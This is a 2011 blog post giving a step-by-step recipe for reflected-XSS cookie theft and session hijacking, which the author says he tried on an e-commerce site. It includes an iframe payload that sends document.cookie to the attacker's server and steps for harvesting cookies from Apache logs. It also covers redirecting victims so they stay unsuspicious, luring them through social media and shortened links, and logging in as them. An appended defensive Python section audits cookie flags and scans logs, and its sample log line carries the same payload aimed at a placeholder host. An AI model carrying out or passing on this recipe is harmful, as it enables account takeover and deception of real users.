Thursday, April 28, 2011

Steal that cookie !

Well, my obsession with web security continues…

Most web sites rely on sessions stored in cookies to identify and authenticate users, and most of those sites are vulnerable to injection of one sort or another.

That's where all the fun is.

Here is a PoC of cookie theft and session hijacking that I tried on an e-commerce web site.

1. Find a way to inject some script or an iframe.

This particular site wasn't directly vulnerable to injection, but it reflected the injected code back into the web page (reflected XSS). Whenever that page is loaded again, the injection takes effect. I tried iframe injection, and it worked well.

Capture the URL that gets generated when the payload (the XSS string) is injected. This is what you'll pass along to the victims.

2. Steal that cookie! Pass the cookie info along to your web server.

There are multiple ways to do this. This is what I tried, and it worked.

I stored a static page on my Apache server. When I injected the iframe, I would do something like this:

< iframe onload=document.location='http://my-web-server/mypage.html?p='+document.cookie / >

Apache's access log records every request along with its query parameters, so the cookie value lands in the log. No need to make POST or GET calls through any code of my own! (I loved that bit.)


3. Redirect the victim back to the site under test.

When loaded, the page redirects to the site under test so the victim doesn't get suspicious. As I mentioned, a simple document.location='http://site-under-test' will do the trick.

4. A bit of social engineering and URL shortening to get the victim to click the link that carries the XSS payload.

Twitter, Facebook and IMs are all out there to help you :)

5. Hijack the session!

Extract the session info from the logs. Replace your cookies with the victim's cookies.
Hail the FSM and reload the site under test. Voila, you are logged in as the victim!


A few caveats:

The assumption is that the victim is already logged in to the site under test, and he/she clicks a hyperlink that injects the XSS.

This is a much better demonstration of XSS, cookie theft and session hijacking than simple alert boxes.
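As an added example (not part of the original post), here are two defender-side checks in Python against the mechanism in steps 2 and 5: an audit of a Set-Cookie header for the attributes that defeat document.cookie theft (HttpOnly is the one that leaves the injected iframe with nothing to send), and a scan of Apache-style access log lines for the reflected iframe/cookie payload, so the site under test can spot such requests in its own logs. The Set-Cookie headers, the log lines and the host attacker.example are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample Set-Cookie headers (not from the original post).
WEAK_SET_COOKIE = "SESSIONID=abc123; Path=/"
HARDENED_SET_COOKIE = "SESSIONID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"


def cookie_findings(set_cookie: str) -> list:
    """Return the attributes a session cookie should carry but this
    Set-Cookie header lacks. HttpOnly is the one that breaks step 2:
    the browser omits HttpOnly cookies from document.cookie, so the
    injected iframe sends an empty value to the attacker's log."""
    attrs = {part.strip().split("=")[0].lower()
             for part in set_cookie.split(";")[1:]}
    return [name for name in ("HttpOnly", "Secure", "SameSite")
            if name.lower() not in attrs]


# Markers of the reflected payload as it would appear in the victim
# site's own access log: the request that carries the iframe/cookie exfil.
MARKERS = re.compile(r"<\s*iframe|<\s*script|document\.cookie|onload\s*=",
                     re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def suspicious_requests(log_lines):
    """Return (client_ip, decoded_url) for Apache combined-log lines whose
    request URL contains an XSS/cookie-theft marker. The URL is decoded
    first so percent-encoded payloads are not missed."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = unquote_plus(m.group(1))
        if MARKERS.search(url):
            hits.append((line.split(" ", 1)[0], url))
    return hits


# Constructed log lines; attacker.example is a placeholder host.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Apr/2011:10:00:00 +0000] "GET /search?q=shoes HTTP/1.1" 200 512',
    '198.51.100.7 - - [28/Apr/2011:10:00:05 +0000] "GET /search?q=%3Ciframe+onload%3D'
    'document.location%3D%27http%3A%2F%2Fattacker.example%2Fp.html%3Fp%3D%27%2B'
    'document.cookie+%2F%3E HTTP/1.1" 200 700',
]
```

Running cookie_findings over the site's real Set-Cookie headers and suspicious_requests over its access log is the quickest way to tell whether steps 2 and 5 would actually work against it.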


PS: I am not responsible if you try this on public web sites and get arrested for cyber crime. In such cases, you do not know me, I do not know you :)